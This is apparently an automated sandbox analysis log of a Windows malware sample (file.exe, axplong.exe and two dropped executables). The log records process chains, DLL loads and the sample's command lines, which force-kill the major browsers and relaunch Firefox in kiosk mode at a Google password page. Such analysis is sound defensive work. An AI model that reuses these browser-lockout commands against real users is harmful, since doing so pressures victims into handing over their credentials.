Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT url, title, last_visit_time, typed_count FROM urls WHERE hidden = 0https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesUnable to find the button element inside the profiler toolbar item.https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpInternalTestingProfileMigrator.getResources expects test profile.transitionState - Not transitioning state because it isn't changing.UpdateService:_postUpdateProcessing - Cleaning up active updates.Error while computing isPotentiallyTrustWorthy for pdf viewer page: resource://devtools/client/performance-new/shared/typescript-lazy-load.jsm.jschrome://browser/content/migration/migration-wizard-constants.mjspromiseLangPacksUpdated - waiting for language pack updates to stage.PanelUI._onNotificationButtonEvent(event, 'secondarybuttoncommand');getCanApplyUpdates - in background task mode, assuming user can't elevateUpdateService:_postUpdateProcessing - Setting update's errorCode UpdateService:_postUpdateProcessing - Attempting handleUpdateFailureUpdateService.canUsuallyCheckForUpdates - able to check for updatesUpdateService:_registerOnlineObserver - observer already registeredUpdateManager:UpdateManager - Initialized downloadingUpdate state to UpdateManager:refreshUpdateStatus - Staging appears to have crashed.UpdateManager:refreshUpdateStatus - Attempting handleUpdateFailureUpdateManager:cleanupDownloadingUpdate - cleaning up downloading update.UpdateService:_postUpdateProcessing - handleUpdateFailure success.CheckerService:#getCanMigrate - this installation can be migratedCheckerService:checkForUpdates - Making new check request for check CheckerService:#updateCheck - request completed downloading documentCheckerService:stopCheck - Not actually cancelling request because Downloader: cancel - Ignoring cancel request of finished downloadDownloader:_canUseBits - Not using BITS because it was already triedDownloader:downloadUpdate - setting currentState to STATE_DOWNLOADINGDownloader:onStopRequest - offline, register online observer: trueDownloader:onStopRequest - Moving downloadingUpdate into readyUpdate
Source: file.exe Virustotal: Detection: 47%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 63371c25d6.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 63371c25d6.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 63371c25d6.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe "C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe "C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe"
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2176 -parentBuildID 20230927232528 -prefsHandle 2068 -prefMapHandle 2060 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ca6a3ee-eee5-454e-b34c-b7afc720e16b} 3184 "\\.\pipe\gecko-crash-server-pipe.3184" 2592836c110 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe "C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe "C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe"
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe "C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe"
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2132 -parentBuildID 20230927232528 -prefsHandle 2076 -prefMapHandle 2068 -prefsLen 25350 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eee284a6-6c71-4aba-bd4c-f339d0acf602} 1648 "\\.\pipe\gecko-crash-server-pipe.1648" 1ef1df6db10 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe "C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe"
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2132 -parentBuildID 20230927232528 -prefsHandle 2076 -prefMapHandle 2060 -prefsLen 25350 -prefMapSize 237931 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1812166d-c4fd-4c53-a2fb-652daad10071} 6848 "\\.\pipe\gecko-crash-server-pipe.6848" 21a4db6e510 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe "C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe "C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2176 -parentBuildID 20230927232528 -prefsHandle 2068 -prefMapHandle 2060 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ca6a3ee-eee5-454e-b34c-b7afc720e16b} 3184 "\\.\pipe\gecko-crash-server-pipe.3184" 2592836c110 socket Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3500 -parentBuildID 20230927232528 -prefsHandle 3680 -prefMapHandle 2940 -prefsLen 26395 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a965bc52-189f-476e-bd3c-458acd57178b} 3184 "\\.\pipe\gecko-crash-server-pipe.3184" 2593fe48210 rdd Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2132 -parentBuildID 20230927232528 -prefsHandle 2076 -prefMapHandle 2068 -prefsLen 25350 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eee284a6-6c71-4aba-bd4c-f339d0acf602} 1648 "\\.\pipe\gecko-crash-server-pipe.1648" 1ef1df6db10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2132 -parentBuildID 20230927232528 -prefsHandle 2076 -prefMapHandle 2060 -prefsLen 25350 -prefMapSize 237931 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1812166d-c4fd-4c53-a2fb-652daad10071} 6848 "\\.\pipe\gecko-crash-server-pipe.6848" 21a4db6e510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll Jump to behavior
